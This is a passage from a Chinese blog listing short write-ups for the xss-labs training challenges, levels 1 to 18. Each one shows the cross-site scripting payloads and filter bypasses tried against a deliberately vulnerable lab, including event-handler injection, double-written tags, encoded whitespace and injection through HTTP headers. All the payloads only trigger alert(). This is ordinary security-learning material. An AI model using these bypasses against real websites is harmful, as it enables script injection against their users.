xss-labs
关注
分享
扫一扫
m0_62094846
这个作者很懒,什么都没留下…
展开
-
level18
和level17差不多 ?arg01=a&arg02=123 onmousedown='alert(1)' ?arg01=a&arg02=123 onmouseover='javascript:alert(1)'原创 2022-02-13 20:24:12 · 451 阅读 · 0 评论 -
level17
(应该是在网站中打开swf文件) 先用基本语句,看看过滤了什么 ?arg01=<script>alert('xss')</script>&arg02=<script>alert('xss')</script> < > 被转义了,而且 " 也被转义了 <embed>标签就是引入一个swf文件到浏览器端,并且它的src属性值没有添加引号,所以不用闭合 直接用这个代码试试 onclick='aler...原创 2022-02-13 19:58:25 · 477 阅读 · 0 评论 -
level16
尝试基本代码 <script>alert(111)</script> 没意外,把script 和 /过滤了,大小写绕过也没用(其实空格也绕过了) ' onmouseover=javascript:alert(1) ' 也没用 编码也没用 可能限制了长度 再试试img的 <img src="111" onerror=alert('xss')> 但是过滤了空格 <img%0asrc="111"%0ao...原创 2022-02-12 23:09:27 · 315 阅读 · 0 评论 -
level15
相当于 php 的 include 这题的环境又有问题,先了解一下做题思路(也没有理解很深) 查一下 ng-include(js) 特别值得注意的几点如下: 1.ng-include,如果单纯指定地址,必须要加引号 2.ng-include,加载外部html,script标签中的内容不执行 3.ng-include,加载外部html中含有style标签样式可以识别 相当于include 过滤了 " 就可以包含level1,因为这里面已经有危险代码了 ?src='...原创 2022-02-12 22:18:54 · 409 阅读 · 0 评论 -
level13
这道题的环境出了问题,就按照别人wp的思路做了 查看源码,cookie上有call me maybe? 应该是这样的 抓包后应该会发现cookie上有这个,再改包就好 Cookie:" type="text" onclick="alert('xss')原创 2022-02-12 21:08:09 · 2173 阅读 · 0 评论 -
level12
根据上一题,先看看源代码 User-Agent: " type="text" onclick="alert('xss')原创 2022-02-12 20:22:08 · 356 阅读 · 0 评论 -
level11
<script>alert('xss')</script>&t_link=" type="text"&t_history=" type="text"&t_sort=" type="text"&t_ref=" type="text" 就按上一题的方法做做试试 可以使用的还是t_sort,但是 " < >又是都被过滤了,没什么用 那就试试t_ref 抓包,直接构造referer(双引号可以用) referer:1...原创 2022-02-11 19:37:51 · 497 阅读 · 0 评论 -
level10
这道题就一段和输入的代码有关的,但是又转义了 < > " 再试试编码 输入编码无法显示 然后发现这串标签可以试试 <script>alert('xss')</script>&t_link=" mmm="text"&t_history=" mmm="text"&t_sort=" mmm="text" 或 <script>alert('xss')</script>&t_li...原创 2022-02-11 18:53:17 · 180 阅读 · 0 评论 -
level9
&被转化了,所以Unicode不能用了,但是我想错了,这道题的思路有点不一样 尝试输入很多东西,蓝色字依然没有变化,但是如果输入一串链接,就会不一样 javascript:alert('http://') ...原创 2022-02-10 23:37:01 · 347 阅读 · 0 评论 -
level8
script,href,javascript都被过滤了 " 也被过滤了,' 也成了中文符号 出现第三行,有href <a href="javascript:alert('xss')">友情链接</a> 可以看出一定要使用href标签,但是这里过滤了javascript <a href=javascript:alert('xss') > xss</a> 又转义了 " ,无法使用top,用 ` 代替后发现双引号又无法闭合 top[`...原创 2022-02-10 22:28:04 · 259 阅读 · 0 评论 -
level7
<script>alert('xss')</script> 这次直接删除了script 直接双写绕过 "><scriscriptpt>alert(111)</scrscriptipt>//原创 2022-02-10 18:25:54 · 209 阅读 · 0 评论 -
level6
经过判断,发现没过滤 < > " 但是有些关键词和' 不能用了,大致判断和第五题一样,换一个标签 "> <a href=javascript:alert('xss') > xss</a> // 也不行了,过滤了href onfocus,onblur,onkeydown,action也被过滤了 (on被过滤了) src也被过滤了 "><table background=javascript:alert(1...原创 2022-02-10 18:17:16 · 241 阅读 · 0 评论 -
level5
<script>alert('xss')</script> 先用普通语句试水,发现这次是在script中加了_ 可以尝试大小写绕过,没用,会被强制转换成小写 而且尝试后发现 " 可以使用, ' 无法使用了 上题的方法也无法使用了 过滤掉了敏感词汇还有<script>但是没过滤 < > ,就可以换一个标签 "> <a href=javascript:alert('xss') > xss</a> // 或...原创 2022-02-10 17:16:56 · 303 阅读 · 0 评论 -
level4
<script>alert('xss')</script> 还是输入普通的代码看看情况 第一部分和上题一样,符号被转义了,第二部分 < > 被过滤了,这道题按理应该可以用上一题的方法解决 但是用之前的无法完成 ' onclick='alert(1) 查找问题所在,先查看 ' 单引号好像变成了中文的’ 对比一下双引号 第二个没问题,但是第一个被转义了,不知道行不行 " onclick="alert(1) 可以成功 ...原创 2022-02-08 19:48:12 · 236 阅读 · 0 评论 -
level3
<script>alert('xss')</script> 用基本的语句尝试,行不通 两个地方都被过滤了, < > / 都被htmlspecialchars()函数转义成了html形式,无法使用标签。 但是 ' 没有被转义(关于符号是否会被转义,可以尝试) (72条消息) JavaScript中的onmouseover事件和onmouseout事件实例_平凡的平淡的博客-优快云博客_onmouseover 构造代码 ' onmous...原创 2022-02-08 19:21:44 · 223 阅读 · 0 评论 -
level2
htmlspecialchars()函数 <script>alert('xss')</script> 用level1的方法,<被过滤了 猜测在服务器端用htmlspecialchars()函数对keyword参数的值进行了处理,value参数值中的恶意代码并没有被编码而是直接原样返回(看了别人的wp) 要想浏览器执行这里的弹窗代码,只需要将属性的引号和标签先闭合就可以了。 "><script>alert('xss')&...原创 2022-01-19 19:44:53 · 431 阅读 · 0 评论 -
level1
反射型xss 传入的值是test,值和长度分别在页面上显示了 查看源代码,发现test是被<h2> <h2>标签包含的 更换值也是一样 将值换成 <script>alert('xss')</script> 这里面不是一定要写xss,换成其他的也可以 ...原创 2022-01-18 13:48:53 · 651 阅读 · 0 评论